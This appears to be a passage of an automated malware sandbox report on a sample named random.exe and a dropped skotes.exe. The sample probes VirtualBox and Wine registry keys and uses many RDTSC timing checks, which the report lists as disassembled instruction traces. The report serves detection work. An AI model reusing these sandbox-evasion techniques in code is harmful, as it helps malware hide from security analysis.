Source: C:\Users\user\AppData\Local\Temp\VQQCSSTI9LML4YUJRVO8FZCNBVH8.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: E30FC8 second address: E30FE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDD08CD5753h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FAA3B7 second address: FAA3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD093B1DEFh 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FAA3CF second address: FAA3D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FA958B second address: FA959A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 js 00007FDD093B1DE6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FA9736 second address: FA973A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FA973A second address: FA973E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACA1D second address: FACA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 je 00007FDD08CD575Dh 0x0000000d jmp 00007FDD08CD5757h 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACA4B second address: FACA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACA52 second address: FACA82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007FDD08CD5746h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jno 00007FDD08CD5754h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c js 00007FDD08CD5746h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACA82 second address: FACA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACA86 second address: FACA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACA8C second address: FACA92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACA92 second address: FACA96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACCC6 second address: FACD65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ja 00007FDD093B1DFBh 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 ja 00007FDD093B1DF8h 0x00000018 pop ebx 0x00000019 nop 0x0000001a mov cx, FF10h 0x0000001e push 00000000h 0x00000020 jmp 00007FDD093B1DF5h 0x00000025 call 00007FDD093B1DE9h 0x0000002a pushad 0x0000002b jmp 00007FDD093B1DEFh 0x00000030 jmp 00007FDD093B1DF3h 0x00000035 popad 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jns 00007FDD093B1DECh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACD65 second address: FACD84 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 pop ecx 0x00000014 mov eax, dword ptr [eax] 0x00000016 jc 00007FDD08CD5750h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACD84 second address: FACD99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FDD093B1DE8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACD99 second address: FACE43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD08CD5751h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e mov edx, 249F1D7Eh 0x00000013 push 00000003h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FDD08CD5748h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov edi, 47B4063Fh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FDD08CD5748h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 add dword ptr [ebp+122D18C6h], edi 0x00000056 push 00000003h 0x00000058 or esi, dword ptr [ebp+122D36ECh] 0x0000005e call 00007FDD08CD5749h 0x00000063 jmp 00007FDD08CD574Dh 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b push ebx 0x0000006c jmp 00007FDD08CD5758h 0x00000071 pop ebx 0x00000072 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACE43 second address: FACE4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACE4A second address: FACE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edx 0x0000000c jmp 00007FDD08CD574Dh 0x00000011 pop edx 0x00000012 mov eax, dword ptr [eax] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACE6B second address: FACE6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACF23 second address: FACF35 instructions: 0x00000000 rdtsc 0x00000002 je 00007FDD08CD5748h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACF35 second address: FACF43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007FDD093B1DE6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FACF43 second address: FACFD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 stc 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FDD08CD5748h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D190Eh], esi 0x0000002b mov edi, dword ptr [ebp+122D33FCh] 0x00000031 push 3A42BB84h 0x00000036 jnp 00007FDD08CD574Ah 0x0000003c xor dword ptr [esp], 3A42BB04h 0x00000043 jmp 00007FDD08CD5755h 0x00000048 je 00007FDD08CD574Ch 0x0000004e mov dword ptr [ebp+122D18B1h], ecx 0x00000054 push 00000003h 0x00000056 cld 0x00000057 push 00000000h 0x00000059 xor esi, dword ptr [ebp+122D36FCh] 0x0000005f push 00000003h 0x00000061 add dword ptr [ebp+122D1BFDh], ebx 0x00000067 push A35E3788h 0x0000006c push eax 0x0000006d push edx 0x0000006e ja 00007FDD08CD5748h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCBDF4 second address: FCBE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDD093B1DE6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCBE03 second address: FCBE07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCBE07 second address: FCBE0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCBE0B second address: FCBE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCBE11 second address: FCBE36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD093B1DF4h 0x00000008 jno 00007FDD093B1DE6h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9D8F7 second address: F9D8FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: F9D8FB second address: F9D907 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDD093B1DE6h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC9D5A second address: FC9D69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FDD08CD5746h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC9D69 second address: FC9D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FC9D6D second address: FC9D89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f jmp 00007FDD08CD574Dh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCA4B0 second address: FCA4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD093B1DF5h 0x00000009 popad 0x0000000a jng 00007FDD093B1DECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCA945 second address: FCA949 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCA949 second address: FCA955 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCA955 second address: FCA95B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCB8A7 second address: FCB8C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jp 00007FDD093B1DE6h 0x0000000d jmp 00007FDD093B1DEAh 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCBCD3 second address: FCBCD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FCE2B0 second address: FCE2F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DEDh 0x00000007 jmp 00007FDD093B1DF6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FDD093B1DF7h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD04D0 second address: FD04D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD4333 second address: FD4337 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD2B65 second address: FD2B6B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD8A3A second address: FD8A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD8A40 second address: FD8A46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD8B8C second address: FD8B90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD8EB0 second address: FD8EB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FD9169 second address: FD9178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007FDD093B1DE6h 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDBB27 second address: FDBB2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDBB2B second address: FDBB35 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDBB35 second address: FDBB40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FDD08CD5746h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDC3CE second address: FDC3D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDC3D3 second address: FDC3D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDC996 second address: FDC99B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDCF38 second address: FDCF4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD574Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDD893 second address: FDD8BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FDD093B1DF9h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDD706 second address: FDD70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDD8BB second address: FDD8D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD093B1DF1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDD70A second address: FDD710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE991 second address: FDE997 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE141 second address: FDE146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDF161 second address: FDF167 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDFC34 second address: FDFC39 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDF167 second address: FDF171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FDD093B1DE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE0825 second address: FE0842 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDFC39 second address: FDFC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007FDD093B1DECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE0842 second address: FE0848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDFC4B second address: FDFC4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE1FFF second address: FE2014 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE0848 second address: FE084C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE7B91 second address: FE7BAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD08CD5759h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE7BAE second address: FE7BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE7D5C second address: FE7DE6 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDD08CD5748h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FDD08CD5748h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 mov ebx, 64375417h 0x0000002a push dword ptr fs:[00000000h] 0x00000031 xor edi, dword ptr [ebp+122D3438h] 0x00000037 mov ebx, ecx 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov edi, dword ptr [ebp+122D29F2h] 0x00000046 mov eax, dword ptr [ebp+122D1751h] 0x0000004c push 00000000h 0x0000004e push eax 0x0000004f call 00007FDD08CD5748h 0x00000054 pop eax 0x00000055 mov dword ptr [esp+04h], eax 0x00000059 add dword ptr [esp+04h], 00000017h 0x00000061 inc eax 0x00000062 push eax 0x00000063 ret 0x00000064 pop eax 0x00000065 ret 0x00000066 and edi, 560AB68Fh 0x0000006c push FFFFFFFFh 0x0000006e jo 00007FDD08CD574Bh 0x00000074 mov ebx, 296036F0h 0x00000079 push eax 0x0000007a push edx 0x0000007b push eax 0x0000007c push edx 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FE7DE6 second address: FE7DEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FEB261 second address: FEB28B instructions: 0x00000000 rdtsc 0x00000002 je 00007FDD08CD5748h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D338Ch] 0x00000013 push 00000000h 0x00000015 mov ebx, dword ptr [ebp+122D3540h] 0x0000001b push 00000000h 0x0000001d sub edi, dword ptr [ebp+122D1823h] 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push edi 0x00000027 pushad 0x00000028 popad 0x00000029 pop edi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FEA3B8 second address: FEA3D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD093B1DF7h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FEC37B second address: FEC385 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FED459 second address: FED50D instructions: 0x00000000 rdtsc 0x00000002 js 00007FDD093B1DECh 0x00000008 jno 00007FDD093B1DE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FDD093B1DE8h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d mov dword ptr [ebp+1244D713h], esi 0x00000033 jmp 00007FDD093B1DF1h 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+12469906h], ebx 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push ecx 0x00000045 call 00007FDD093B1DE8h 0x0000004a pop ecx 0x0000004b mov dword ptr [esp+04h], ecx 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc ecx 0x00000058 push ecx 0x00000059 ret 0x0000005a pop ecx 0x0000005b ret 0x0000005c mov ebx, dword ptr [ebp+122D3418h] 0x00000062 xchg eax, esi 0x00000063 ja 00007FDD093B1DF3h 0x00000069 push eax 0x0000006a pushad 0x0000006b pushad 0x0000006c pushad 0x0000006d popad 0x0000006e jmp 00007FDD093B1DF7h 0x00000073 popad 0x00000074 push eax 0x00000075 push edx 0x00000076 jng 00007FDD093B1DE6h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FEC67B second address: FEC685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FED6F0 second address: FED6F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
